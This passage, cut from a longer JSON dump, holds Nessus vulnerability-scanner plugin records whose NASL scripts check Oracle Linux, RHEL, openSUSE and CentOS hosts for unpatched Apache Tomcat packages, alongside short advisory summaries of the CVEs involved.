value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2019-2205 advisory.\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have configured it appropriately for their environment rather\n than using it in the default configuration. Therefore, it is expected that most users will not be impacted\n by this issue. (CVE-2018-8014)\n\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by\n default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n 7.0.35 to 7.0.88. (CVE-2018-8034)\n\n - The URL pattern of (the empty string) which exactly maps to the context root was not correctly handled\n in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as\n part of a security constraint definition. This caused the constraint to be ignored. It was, therefore,\n possible for unauthorised users to gain access to web application resources that should have been\n protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to\n 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because\n security constraints defined in this way apply to the URL pattern and any URLs below that point, it was\n possible - depending on the order Servlets were loaded - for some security constraints not to be applied.\n This could have exposed resources to users who were not authorised to access them. (CVE-2018-1305)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2019-2205.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar pkgs = [\n {'reference':'tomcat-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-admin-webapps-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-docs-webapp-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-el-2.2-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-javadoc-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-jsp-2.2-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-jsvc-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-lib-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-servlet-3.0-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-webapps-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:26:49", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.", "cvss3": {}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "RHEL 7 : tomcat (RHSA-2019:2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-01-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat", "p-cpe:/a:redhat:enterprise_linux:tomcat-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-webapps", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2205.NASL", "href": "https://www.tenable.com/plugins/nessus/127697", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2205. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127697);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/06\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:2205\");\n\n script_name(english:\"RHEL 7 : tomcat (RHSA-2019:2205)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security\nconstraints can lead to unintended exposure of resources\n(CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to\nresource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:2205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8034\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2205\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:41:32", "description": "This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with supplementary characters could have lead to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2018-10-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2018-1129)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-1129.NASL", "href": "https://www.tenable.com/plugins/nessus/117983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1129.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117983);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2018-1129)\");\n script_summary(english:\"Check for the openSUSE-2018-1129 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during\n update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at\n http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T\n omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n # http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#Tomcat_9.0.10_(markt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8887ec3f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-admin-webapps-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-docs-webapp-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-el-3_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-embed-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-javadoc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsp-2_3-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsvc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-lib-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-servlet-4_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-webapps-9.0.10-lp150.2.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:12", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2019:1529 advisory.\n\n - tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\n - tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": 